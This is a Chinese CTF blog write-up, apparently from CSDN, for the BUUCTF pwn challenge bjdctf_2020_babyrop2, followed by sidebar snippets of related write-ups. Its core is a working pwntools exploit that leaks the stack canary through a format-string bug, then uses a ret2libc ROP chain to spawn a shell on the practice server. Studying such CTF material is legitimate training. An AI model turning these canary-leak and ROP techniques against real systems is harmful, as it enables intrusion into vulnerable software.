buuctf bjdctf_2020_babyrop2做题笔记 格式化字符串漏洞

最新推荐文章于 2022-05-01 20:10:44 发布
最新推荐文章于 2022-05-01 20:10:44 发布
阅读量219 收藏
点赞数
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45441024/article/details/110981890
版权

buuctf bjdctf_2020_babyrop2做题笔记

from pwn import *
from LibcSearcher import *
proc_name = '/home/pwn/Desktop/bjdctf_2020_babyrop2'
p = remote('node3.buuoj.cn', 27642)
elf = ELF(proc_name)
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main=elf.sym['main']
rdi=0x400993
p.sendlineafter("I'll give u some gift to help u!\n",'%7$p')
p.recvuntil('0x')
canary = int(p.recv(16),16)
payload=p64(canary)
payload=payload.rjust(0x20,b'a')
payload+=b'aaaaaaaa'
payload+=p64(rdi)
payload+=p64(puts_got)+p64(puts_plt)+p64(main)
p.sendlineafter('Pull up your sword and tell me u story!\n',payload)
puts_addr=u64(p.recv(6).ljust(8,b'\x00'))
print(hex(puts_addr))

libc=LibcSearcher('puts',puts_addr)
base=puts_addr-libc.dump('puts')
system=base+libc.dump('system')
bin_sh=base+libc.dump('str_bin_sh')
payload=p64(canary)
payload=payload.rjust(0x20,b'a')
payload+=b'aaaaaaaa'+p64(rdi)+p64(bin_sh)+p64(system)+p64(0)
p.sendlineafter("I'll give u some gift to help u!\n",'%7$p')
p.sendlineafter('Pull up your sword and tell me u story!\n',payload)
p.interactive()

做题思路 ,泄露canary地址,最后构造

三哥sange
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF bjdctf_2020_babyrop 1 和 2
BengDouLove的博客
04-09 1490
这两个rop其实是差不多的,第二个比第一个多了一个canary 先看一下第一个 bjdctf_2020_babyrop1 init里面两个puts vul里面一个puts一个read 没有system和binsh ,要泄露libc,但是现在没有可以控制的输出手段,,所以要通过read,,覆盖返回地址为puts,,构造参数让puts输出libc的函数 这是网上别人的做法,,首先到pop rd...
BUUCTFbjdctf_2020_babyrop2
m0_51251108的博客
12-30 364
BUUCTFbjdctf_2020_babyrop2 有canary ida看下程序 有格式化漏洞,但有6格宽度限制 有栈溢出 思路:这题靠格式化字符串漏洞泄露出canary的地址 然后栈溢出,ret2libc 泄露方法: 一次一次试过去,找到我们输入的位置的偏移 然后这题里偏移+1就是canary了 然后就能把canary带出来,canary每次运行都不一样 所以要实时接收 一个程序不同函数的canary好像都相同 特别提醒自己在接收环节的处理 exp: from pwn import*
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 397
buuctf-pwn 001-016题wp
bjdctf_2020_babyrop2
、moddemod
07-06 570
注意这题开启了Canary 因为限制了payload长度就不可以写got表了,但是可以直接泄露Canary值,在vuln中进行栈溢出即可拿到shell… exp from pwn import * from LibcSearcher import * context.log_level = 'debug' proc_name = './bjdctf_2020_babyrop2' elf = ELF(proc_name) p = process(proc_name) p = remote('node3..
pwn7第七关
qq_18823653的博客
04-03 389
前面几个懒得写了,直接第七个吧,溢出点和前面一样get()函数,112字节,保护只开了NX程序本身没有system(),也没有/bin/sh,且栈不可执行,用ROPgadget也没找到有用的语句,但是程序是动态链接的,运行时会加载so库,可以用put()泄露出put的真实地址,又因为ASLR随机化不了地址底12位,可以用put真实地址的底12位查询加载的那个版本的libc.so,以及确定libc的...
java学习笔记_关于字符串概述
08-30
字符串概述】 在Java编程语言中,字符串是一个非常基础且重要的概念。字符串是字符的序列,通常用来存储和处理文本信息。Java中的字符串主要通过`String`类来表示,它是一个不可变对象,这意味着一旦创建了`...
python入门 字符串格式化练习format (5.9)
01-20
笔记也真的太重要了 学python真的要多敲多记呀 1.输入1个字符a,用字符乘号( * )分割a,首尾用波浪线(~)组合输出 举个栗子就是输入:a * b * c * d * e 输出的样子:a ` e (~这个真的是波浪线,可以自己随意换...
Python字符串与正则表达式学习笔记
12-20
在Python编程语言中,字符串和正则表达式是两个非常重要的概念,广泛应用于数据处理、文本分析和信息提取。下面是对这两个主题的详细说明。 ### 1. 数值与布尔型 在Python中,数值类型主要包括整型(int)和浮点型...
Python笔记—利用字符串格式化输出好看文本.7z
09-25
文件名:Python笔记—利用字符串格式化输出好看文本 配合博客地址:https://blog.csdn.net/XianZhe_/article/details/107762041 为在学习Python时所整理制作的笔记文件
python字符串学习笔记.python字符串操作方法.doc
09-30
Python字符串是编程中常用的数据类型,用于存储和处理文本信息。在Python中,字符串是由一个或多个字符组成的序列,它们可以被单引号(' ')或双引号(" ")包围。以下是一些关于Python字符串的重要知识点: 1. **字符...
BUUCTF HarekazeCTF2019 babyrop2
doudoudedi
11-01 1243
这道题是用printf泄露已经调用过的函数确定libc文件然后用ROPgetshell(这里有格式化字符串,没有的话可以read一个然后在泄露反正够长) exp: #coding:utf-8 #name:doudou from pwn import * #p=process('./babyrop2') p=remote('node3.buuoj.cn',28818) elf=ELF('./baby...
bjdctf_2020_babystack2
、moddemod
06-30 307
exp from pwn import * context.log_level = 'debug' proc_name = './bjdctf_2020_babystack2' p = process(proc_name) p = remote('node3.buuoj.cn', 26363) ..
buuoj Pwn writeup 41-45
yongbaoii的博客
02-11 224
41 [ZJCTF 2019]EasyHeap 42 picoctf_2018_rop chain 43 [V&N2020 公开赛]simpleHeap 44 hitcontraining_uaf 45 bjdctf_2020_babyrop2 46 47 48 49 50
BUUCTF-PWN刷题记录-16
weixin_44145820的博客
05-05 715
目录ciscn_2019_es_5(realloc double free)npuctf_2020_easyheap(off-by-one) ciscn_2019_es_5(realloc double free) 申请没有大小限制,数目上限为10 edit会调用realloc重新申请(其实不会的,因为大小不变) 如果edit就不能show了 看了一下这题没有什么明显漏洞,但是考虑到re...
[BUUCTF-PWN] rip
m0_46098032的博客
01-02 184
下载文件,checksec查看一下文件,64位文件,没有开启任何保护。 用IDA64位打开文件,反编译main函数,看到了gets函数,gets函数存在栈溢出漏洞。 双击s,可以看到现只需存入15个字节即可劫持函数返回地址。 我们同时可以看到存在一个fun函数。就是一个系统调用。 查看一下fun函数的地址,为0x401186 exp如下: from pwn import * p = remote('node4.buuoj.cn', :9228) payload = b.
bjdctf_2020_babyrop
、moddemod
06-23 400
exp from pwn import * from LibcSearcher import * context(log_level='debug') proc_name = './bjdctf_2020_babyrop' p = process(proc_name) # p = remote('node3.buuoj.cn', 28227) elf = ELF(proc_name) read_got = elf.got['read'] puts_plt = elf.plt['puts'] main_.
BUUCTF pwn水题大赏(六)
o琦野o的博客
03-11 327
BUUCTF pwn水题大赏suctf_2018_stack suctf_2018_stack 最最最最最最基本的栈溢出,也不知道为啥会这么高分。 exp: from pwn import* context.log_level = 'DEBUG' p=remote('node3.buuoj.cn',28582) #p=process('./SUCTF_2018_stack') elf=ELF('./SUCTF_2018_stack') payload = 'a'*0x28+p64(0x0040067A)
[BUUCTF-pwn] whitehat2018_pwn01
weixin_52640415的博客
12-30 378
又是一个代码巨长的程序,前十页没有有用的东西 程序开了PIE但是直接给了地址,== no PIE 在sub_1178发现fgets(s, 230, stdin); 这里s定义是rbp-d0 可以溢出到reb 也就是可以在这移栈 int sub_1178() { void *v0; // rax char s[112]; // [rsp+0h] [rbp-D0h] BYREF char nptr[16]; // [rsp+70h] [rbp-60h] BYREF char s1[32]
buuctf刷题——[OGeek2019]babyrop 1
qq_41560595的博客
03-14 3510
好久好久没做ctf题了,今天得空刷刷buuctf,emm,发现好多都忘了。???????????? 查看权限 不能利用shellcode,但可以构造栈溢出。 查看源程序 为了方便区分,重命名了下函数。 open函数的返回值:如果操作成功,它将返回一个文件描述符,如果操作失败,它将返回-1; 文件描述符:0,1,2是标准IO输入/输出/错误输出给占用了,当文件open成功了,会返回数值3; read(fd,&buf,4u)是把fd所指向的随机数写入到buf文件中,长度是4个字节。 此时,buf是
Python 3入门:掌握字符串操作与格式化
7. **字符串格式化**:Python提供了丰富的字符串格式化功能,尽管本例未展示,但Python的f-string或`str.format()`方法可用于创建格式化的输出,如`"{0} {1}".format(a, b)`。 这些知识点展示了Python字符串的基本...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值